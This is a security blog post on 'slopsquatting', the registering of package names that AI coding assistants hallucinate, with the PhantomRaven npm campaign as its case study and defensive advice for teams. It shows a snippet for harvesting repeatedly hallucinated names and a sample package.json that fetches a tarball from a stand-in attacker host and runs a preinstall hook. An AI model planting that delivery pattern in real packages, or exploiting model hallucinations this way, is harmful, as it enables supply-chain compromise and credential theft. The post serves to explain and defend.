security · supply-chain · ai-agents

Slopsquatting: From Typos to AI Supply Chain Attacks

Slopsquatting turns AI package hallucinations into a new software supply chain attack path. PhantomRaven shows why this is now an active npm threat, not a theoretical one.

March 16, 2026 · 8 min read · by Beatriz Datangel Rodgers


Photo by Jakub Żerdzicki on Unsplash

Asking an AI coding assistant for a package recommendation introduces a supply chain risk that used to require a human typo. No misspelling is needed: the model invents the name, the developer trusts the suggestion, and the attacker is already waiting. That is slopsquatting, and it is why the technique matters.

Before AI, package attacks mostly depended on familiar mistakes: typoing a dependency name, trusting a fake domain, or installing a package that looked close enough to a real one. With slopsquatting, the attacker does not wait for the developer to make the naming mistake. The model makes it first. Then the attacker registers the invented package and waits for the developer to trust the suggestion.

That sounds like a small change. It is not. It means the package discovery layer inside the IDE, terminal, and chat window is now part of the software supply chain attack surface.

Figure 1: The slopsquatting kill chain — from prompt to payload.


The Pre-AI Version of This Problem

Software supply chain social engineering has always targeted trust shortcuts:

  • Phishing to steal maintainer or developer credentials
  • Domain squatting to host fake docs or downloads
  • Typosquatting to catch misspelled package installs
  • Dependency confusion to exploit registry resolution behavior

All four tactics work because developers move quickly. If a package name looks plausible and the install succeeds, it often gets the benefit of the doubt.

Slopsquatting belongs in that lineage. It is the same social engineering logic, but routed through model output instead of direct human error.

Figure 2: How software supply chain attacks have evolved.


Why AI Assistants Change the Economics

AI coding assistants — GitHub Copilot, Cursor, ChatGPT, Claude, Codeium — now suggest code in the IDE, answer questions in chat, and help at the command line. That reach is exactly why these tools create a new attack surface. They are not just writing functions. They are increasingly acting as package discovery engines.

The underlying model failure here is package hallucination: the assistant recommends a dependency that sounds legitimate but does not actually exist.

The USENIX analysis of package hallucinations shows this is not a niche problem:

Metric                                       Value
------                                       -----
Models tested                                16
Average hallucination rate                   19.6%
Commercial models                            ~5%
Open-source models                           ~21%
Unique fake package names observed           205,474
Repeated for the same prompt                 ~45%
Reappeared across 10 follow-up prompts       ~60%

That last point is the big one. If hallucinated names were one-off randomness, slopsquatting would be noisy and unreliable. But repeated hallucinations create predictable targets attackers can claim in public registries.

This is what makes slopsquatting more dangerous than simple typosquatting. The attacker is no longer guessing what a tired developer might mistype. They can watch what models repeatedly invent.
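That "watch what models repeatedly invent" step is easy to picture. A minimal sketch of the attacker's side of it, assuming suggestions have been collected from repeated runs of the same prompt (all package names and the repeat threshold below are hypothetical, for illustration only):

```python
from collections import Counter

def stable_hallucinations(runs, min_repeats=3):
    """Given lists of package names suggested across repeated runs of the
    same prompt, return names that recur often enough to be worth
    registering -- the 'predictable target' property the USENIX data describes."""
    counts = Counter(name for run in runs for name in set(run))
    return [name for name, n in counts.most_common() if n >= min_repeats]

# Hypothetical suggestions from four runs of one prompt.
runs = [
    ["graphql-codegen-core", "left-pad"],
    ["graphql-codegen-core", "express"],
    ["graphql-codegen-core", "fast-xml-tools"],
    ["fast-xml-tools", "graphql-codegen-core"],
]
print(stable_hallucinations(runs))  # → ['graphql-codegen-core']
```

One-off hallucinations drop out of the counter; only the names a model keeps reproducing survive the threshold, and those are exactly the names worth registering.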


PhantomRaven Proves This Is Already Operational

The best case study is PhantomRaven.

Koi Security's original write-up described PhantomRaven in October 2025 as a campaign spanning 126 malicious npm packages and more than 86,000 downloads. The operation harvested npm tokens, GitHub credentials, and CI/CD secrets while hiding its payload in what Koi called "invisible dependencies."

A follow-up analysis in March 2026 tied three new waves to the same actor — and as of March 10, 2026, 81 of the 88 newly identified malicious packages were still available on npm, with 2 of 3 C2 servers still live.

That matters because PhantomRaven is not a one-off package compromise. It is a repeatable campaign with infrastructure, naming strategy, and evasion patterns.


How PhantomRaven Exploits the Same Trust Gap

PhantomRaven did not rely on random lookalikes. The actor targeted package names that developers — or models — would plausibly expect to exist. That is not proven to be AI-hallucination-driven, but it exploits the exact same trust gap slopsquatting weaponizes: if a name feels right in context, it gets installed.

  • Wave 2 focused heavily on GraphQL Codegen-style names, betting users would omit the @graphql-codegen/ scope prefix
  • Wave 3 shifted heavily toward Babel plugin names
  • Wave 4 targeted import/export utility names

That is slopsquatting in practice: registering packages that feel semantically correct in context, even if no legitimate package ever existed there before.

The attacker also paired the naming strategy with a technical delivery method built for evasion. npm's package.json documentation allows tarball URL dependencies, and npm's scripts documentation still supports lifecycle hooks like preinstall, install, and postinstall.

PhantomRaven used a technique researchers call Remote Dynamic Dependencies (RDD):

Figure 3: PhantomRaven's Remote Dynamic Dependency delivery mechanism.

The npm-hosted package looked mostly harmless. A dependency pointed to an attacker-controlled tarball URL, the real payload was fetched during install, and lifecycle hooks executed the malicious logic. That design is important because it lets malicious behavior live outside the package body most scanners inspect first.
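A minimal sketch of what an RDD-style manifest can look like. Every name and URL here is hypothetical; the point is the shape — a dependency resolved from an attacker-controlled tarball URL, paired with a lifecycle hook that runs automatically at install time:

```json
{
  "name": "some-plausible-helper",
  "version": "1.0.2",
  "dependencies": {
    "config-loader": "https://cdn.example-attacker.net/pkgs/config-loader.tgz"
  },
  "scripts": {
    "preinstall": "node ./setup.js"
  }
}
```

Nothing in the npm-hosted tarball itself has to look malicious; the payload lives behind the URL and can change between installs.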


What Makes Slopsquatting Different From Older Attacks

Slopsquatting introduces three problems older software supply chain social engineering did not have at the same scale.

1. The bad suggestion can come from a trusted workflow. The developer is not pulling a random package from a forum. The dependency appears inside the IDE or AI chat panel they already use every day.

2. The attack surface is generative. Models can produce a huge volume of plausible-sounding fake names across frameworks, languages, and package ecosystems.

3. The detection signal is weaker. A typo can look suspicious if you know the real package. A hallucinated name may look perfectly valid because it matches the code context.

                Typosquatting                         Slopsquatting
Error source    Human typo                            Model hallucination
Scale           Limited by common misspellings        Generative — unlimited plausible names
Trust signal    None — random install                 High — suggested by trusted AI tool
Detection       Levenshtein distance from real name   No "real" package to compare against

Figure 4: Typosquatting vs. slopsquatting — side by side.

This is why slopsquatting should be treated as AI-mediated social engineering, not just rebranded typosquatting.
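The detection gap in that comparison is concrete. A minimal sketch of the classic typosquatting check, assuming a small allowlist of known-good names (the allowlist and the edit-distance threshold are illustrative, not a real tool's defaults):

```python
def levenshtein(a: str, b: str) -> int:
    """Classic dynamic-programming edit distance between two strings."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,          # deletion
                           cur[j - 1] + 1,       # insertion
                           prev[j - 1] + (ca != cb)))  # substitution
        prev = cur
    return prev[-1]

KNOWN = ["express", "lodash", "react", "graphql"]

def looks_like_typosquat(name: str, max_dist: int = 2) -> bool:
    """Flags names one or two edits away from a known package --
    the signal typosquat detectors rely on."""
    return any(0 < levenshtein(name, k) <= max_dist for k in KNOWN)

print(looks_like_typosquat("expresss"))              # → True  (near "express")
print(looks_like_typosquat("graphql-codegen-core"))  # → False (no nearby real name)
```

A hallucinated name sails through this check precisely because there is no legitimate neighbor to measure against.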


What Teams Should Do Now

The mitigation story is not "use less AI." It is "stop treating AI-suggested dependencies as pre-validated."

Security and platform teams should do seven things immediately:

  1. Review every new dependency introduced through AI-generated code.
  2. Flag tarball URLs, Git dependencies, and unexpected install hooks in package.json.
  3. Verify unfamiliar packages against official docs, maintainer history, and provenance signals before install.
  4. Enforce lockfile discipline — commit lockfiles, review lockfile diffs in PRs, and run npm audit signatures where available.
  5. Add policy checks in CI for risky dependency patterns, not just known CVEs. Consider registry allowlists for critical projects.
  6. Train developers that "the model suggested it" is not evidence that the package is legitimate.
  7. Push security tooling earlier into the workflow so suspicious package names are caught in the IDE or PR, not after they hit production.
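Items 2 and 5 can start as a very small policy check. A sketch that scans a parsed package.json for non-registry dependency specs and install-time hooks — the prefixes, sections, and sample manifest are illustrative, and a real check would also walk the lockfile-resolved tree:

```python
import json

RISKY_HOOKS = {"preinstall", "install", "postinstall"}
RISKY_PREFIXES = ("http://", "https://", "git://", "git+", "github:")

def risky_patterns(manifest: dict) -> list[str]:
    """Returns findings for dependency specs that resolve outside the
    registry and for lifecycle hooks that run automatically at install."""
    findings = []
    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        for name, spec in manifest.get(section, {}).items():
            if spec.startswith(RISKY_PREFIXES):
                findings.append(f"{section}/{name}: non-registry spec {spec!r}")
    for hook in sorted(RISKY_HOOKS & set(manifest.get("scripts", {}))):
        findings.append(f"scripts/{hook}: runs automatically at install time")
    return findings

# Hypothetical manifest shaped like the RDD pattern described above.
manifest = json.loads("""
{
  "dependencies": {"config-loader": "https://cdn.example-attacker.net/x.tgz"},
  "scripts": {"preinstall": "node setup.js"}
}
""")
for finding in risky_patterns(manifest):
    print(finding)
```

Run in CI against every PR that touches a manifest, a check like this catches PhantomRaven-style tarball dependencies before known-CVE scanners would ever see a payload.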

The USENIX research also suggests a longer-term direction: fine-tuning and self-detection techniques can reduce hallucination rates. That is promising, but it is not a substitute for registry, CI, and developer-side controls.


The Bigger Shift

Pre-AI supply chain attacks exploited what developers typed. Slopsquatting exploits what models suggest.

That difference changes the economics of the attack. It gives attackers a scalable way to manufacture believable package names, register them cheaply, and wait inside normal development workflows.

PhantomRaven shows the threat is already live. The packages are real. The infrastructure is real. The attacker tradecraft is improving. Security teams that still think of package risk as a typo problem are defending the last generation of the attack.

The next generation starts with autocomplete.


Sources: USENIX package hallucination research · Koi Security PhantomRaven analysis · PhantomRaven follow-up (March 2026) · npm package.json docs · npm scripts docs
